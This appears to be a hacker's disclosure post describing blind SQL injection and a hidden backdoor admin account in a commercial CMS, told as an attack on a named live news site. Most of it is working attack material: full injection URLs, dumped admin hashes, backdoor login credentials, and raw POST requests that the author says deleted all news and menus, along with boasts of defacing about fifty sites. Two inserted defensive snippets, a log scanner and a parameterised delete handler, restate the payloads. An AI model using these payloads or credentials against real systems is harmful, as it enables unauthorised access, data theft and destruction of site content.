========================================================
Vulnerable Software(s): CMS | 1.11b / CMS | 1.7.1 from studio-one.am
Vulnerabilities: These content management systems suffer from remote blind SQL injection and a backdoor account.
Software License: Commercial
Vendor: studio-one.am
Discovered and Exploited: In the wild
========================================================
I'M => AkaStep <= RESPONSIBLE FOR EVERYTHING IN THIS advisory = REALLY!
****************** ENJOY MAXIMALLY ******************

Full Disclosure:

The following CMS | 1.11b and CMS | 1.7.1 (from studio-one.am) content management systems suffer from remote blind SQL injection and a backdoor account.

// TRUE
http://galatv.am/news/other/aimm-naxagahh%27%20or%20sleep(10)--%20and%205=%275.html

We got a time delay: galatv.am runs CMS | 1.11b.

http://galatv.am/news/other/aimm-naxagahh%27%20order%20by%2026--%20and%205=%275.html

Got column count: 26

Problem number 1: we can't use "," in the URL, otherwise we get a 404 (maybe a rewrite rule?).
Bypass? Pretty simple: use the percent-encoded (hex 2C) representation of ",", so it's %2C:

http://galatv.am/news/other/aimm-naxagahh%27%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26--%20and%205=%275.html

Success!
http://galatv.am/news/other/saimm-naxagahh%27%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26--%20and%205=%275.html

Output: 21 22 21 24 14

http://galatv.am/news/other/saimm-naxagahh%27%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2Cgroup_concat%28table_name%29%2C22%2C23%2C24%2C25%2C26%20from%20information_schema.tables--%20and%205=%275.html

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,s1_ads,s1_ads_menu_rel,s1_ads_ml,s1_adsgroup,s1_adsgroup_ml,s1_answers,s1_answers_ml,s1_autor,s1_autor_m

So we need to obtain login and password from s1_users:

galatv.am/news/other/saimm-naxagahh' union select 1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2Cgroup_concat(login%2Cpassword)%2C22%2C23%2C24%2C25%2C26 from s1_users-- and 5='5.html

100%
----------------------------------------------------
admin      6dedf4ba59fbcd8c2d72eec63738fc6d
GalaAdmin  4bad4ecf9b88e344a7e6fbe517d4e590
----------------------------------------------------
newPass123

Printscreen: http://s44.radikal.ru/i106/1209/3c/64f2a7cf8278.png

OwNEd! http://zone-h.org/mirror/id/18297506

Done! Ok. After gaining access to the administration panel I noticed there are >= 2800 news items in the database. Ownage without "rm"s or "drop"s against .am domains is not interesting anymore.
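The probes above (time delay via sleep(), an "order by" column count, then a union select with commas hidden as %2C) leave a clear trail in the web server's access log. As an added example that is not part of the advisory, this Python script URL-decodes each request path and flags those patterns; the log lines are constructed samples modelled on the requests above, and the signature names are my own.

```python
"""Added example (not from the advisory): flag the request patterns shown
above in web-server access logs.  The log lines below are constructed samples."""
import re
from urllib.parse import unquote_plus

# Constructed access-log lines modelled on the advisory's probes (IPs are RFC 5737 test addresses).
SAMPLE_LOG = """\
203.0.113.5 - - [03/Sep/2012:10:01:12 +0400] "GET /news/other/aimm-naxagahh%27%20or%20sleep(10)--%20and%205=%275.html HTTP/1.1" 200 5120
203.0.113.5 - - [03/Sep/2012:10:01:40 +0400] "GET /news/other/aimm-naxagahh%27%20order%20by%2026--%20and%205=%275.html HTTP/1.1" 200 5120
203.0.113.5 - - [03/Sep/2012:10:02:05 +0400] "GET /news/other/saimm-naxagahh%27%20union%20select%201%2C2%2Cgroup_concat%28table_name%29%20from%20information_schema.tables--%20and%205=%275.html HTTP/1.1" 200 9000
198.51.100.7 - - [03/Sep/2012:10:03:00 +0400] "GET /news/other/aimm-naxagahh.html HTTP/1.1" 200 5120
"""

# Signatures run against the *decoded* path: the advisory hides ',' as %2C and ' as %27,
# so matching the raw line would miss them.
SIGNATURES = {
    "time-based blind (sleep/benchmark)": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "column-count probe (order by N)":    re.compile(r"\border\s+by\s+\d+", re.I),
    "union-based extraction":            re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema/data enumeration":           re.compile(r"information_schema|group_concat\s*\(", re.I),
    "quote followed by SQL comment":     re.compile(r"'.*--"),
}
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def scan_log(text):
    """Return (client_ip, decoded_path, [matched signature names]) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _ts, _method, raw_path, _status = m.groups()
        decoded = unquote_plus(raw_path)   # %27 -> ', %2C -> ',', %20 -> space
        names = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
        if names:
            hits.append((ip, decoded, names))
    return hits

if __name__ == "__main__":
    for ip, path, names in scan_log(SAMPLE_LOG):
        print(ip, names, path)
```

Only the three probe lines are reported; the plain article request from the second address is not.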
Searching.. Searching.. Got it. Here is the truncating way:
------------------------------------------------------------------------------------------------------------------------
Live HTTP Headers:

URL: http://galatv.am/admin/news-content/news?viewAjax=1&action=delete&tpl=view.tpl
Host: galatv.am
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 18
Cookie: PHPSESSID=ak1cgrd9c1rlm5fgca26vnjh73
Pragma: no-cache
Cache-Control: no-cache

POST DATA:
viewAjax=1&id=1000000000000 or id!=3--

*REPLAY*
------------------------------------------------------------------------------------------------------------------------
Printscreen: http://s019.radikal.ru/i625/1209/95/fccad046aa62.png

BoOm!) All news was successfully "truncated" using the SQLi vuln)

Then I needed to truncate the menu sections. Same technique:
------------------------------------------------------------------------------------------------------------------------
Live HTTP Headers:

URL: http://galatv.am/admin/content%20elements/menu?viewAjax=1&action=delete&tpl=view.tpl
Host: galatv.am
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 16
Cookie: menutreeNodes=%5B1%5D; PHPSESSID=ak1cgrd9c1rlm5fgca26vnjh73; __utma=137480943.837184604.1346617574.1346617574.1346617574.1; __utmb=137480943.2.10.1346617574; __utmc=137480943; __utmz=137480943.1346617574.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Pragma: no-cache
Cache-Control: no-cache

POST DATA:
viewAjax=1&id=27 or id!=007
------------------------------------------------------------------------------------------------------------------------
Again Boom!)

=================== WE ALSO LOVE BACKDOORS ========================

This CMS also suffers from a backdoor account which has full administrative privileges.
It is also a hidden account: this means you can't see it from the administration panel.

Print screen: (Basically, there is 1 backdoor account and 1 legal administrator. Notice: the backdoor account isn't visible anymore.)
http://s53.radikal.ru/i140/1209/c4/685d07418e00.png

I used this administrative account to deface and "rm" approx. 50 .am sites)

Login: admin
Pass: newPass123

===================== CMS version 1.7.1 ==============================

How it looks: http://s019.radikal.ru/i602/1209/2d/85589f0d9f49.png

Also suffers from a backdoor account:
Print screen: http://i021.radikal.ru/1209/83/8390644da6b5.png

The account named "admin" is still invisible again.

:: CMS :: | 1.7.1
Demo: http://new.galatv.am/admin/
Login: admin
Pass: newPass123

This version is also vulnerable to SQLi. Again I "rm"-ed all news using SQLi:

URL: http://new.galatv.am/admin/news-block/news?action=delete&viewAjax=1&tpl=dt/edit-dialog.tpl
Host: new.galatv.am
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 38
Cookie: PHPSESSID=bqu6dn6ks70iqocivfioetomh7
Pragma: no-cache
Cache-Control: no-cache

POST DATA:
btnDelete=Delete&btnCancel=Cancel&id=1 or id!=011111111111111

Returned:
{"succsess":true,"records":["1 or id!=011111111111111"]}

==========================================
To studio-one.am: We love backdoors too;)

=============== THE END ===================

SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securityvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com

To all AA Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3.*
===========================================================
/AkaStep
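The admin "delete" endpoints shown above, in both CMS versions, accept an id such as "1000000000000 or id!=3--" because the request parameter is pasted straight into the query text. As an added example that is not the vendor's code, this Python/sqlite3 sketch shows that bug beside the fix (reject anything that is not a plain integer, then bind it as a parameter); the table name s1_news and the function names are assumed.

```python
"""Added example (not the vendor's code): a minimal 'delete news' handler in
Python/sqlite3, showing why id=1000000000000 or id!=3-- empties the table when
the id is concatenated into the SQL, and the fix: integer validation plus
parameter binding.  Table name s1_news and the function names are assumed."""
import sqlite3

def make_db(n=5):
    """Constructed in-memory table standing in for the CMS news table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE s1_news (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO s1_news VALUES (?, ?)",
                   [(i, f"news {i}") for i in range(1, n + 1)])
    return db

def count(db):
    return db.execute("SELECT COUNT(*) FROM s1_news").fetchone()[0]

def delete_vulnerable(db, id_param):
    """Mirrors the bug behind the advisory's delete requests: the raw request
    parameter becomes part of the query text, so 'or id!=3' widens the WHERE."""
    db.execute(f"DELETE FROM s1_news WHERE id = {id_param}")   # never do this
    return count(db)                                            # rows left

def delete_hardened(db, id_param):
    """Accept only a plain integer and bind it; anything else is rejected
    before it reaches the database (a real handler would answer HTTP 400)."""
    try:
        news_id = int(id_param)          # '1000000000000 or id!=3--' -> ValueError
    except (TypeError, ValueError):
        return None
    cur = db.execute("DELETE FROM s1_news WHERE id = ?", (news_id,))
    return cur.rowcount                  # 0 or 1, never the whole table

if __name__ == "__main__":
    payload = "1000000000000 or id!=3--"   # POST body value from the advisory
    print("vulnerable handler, rows left:", delete_vulnerable(make_db(), payload))   # 1
    db = make_db()
    print("hardened handler:", delete_hardened(db, payload), "rows left:", count(db))  # None 5
```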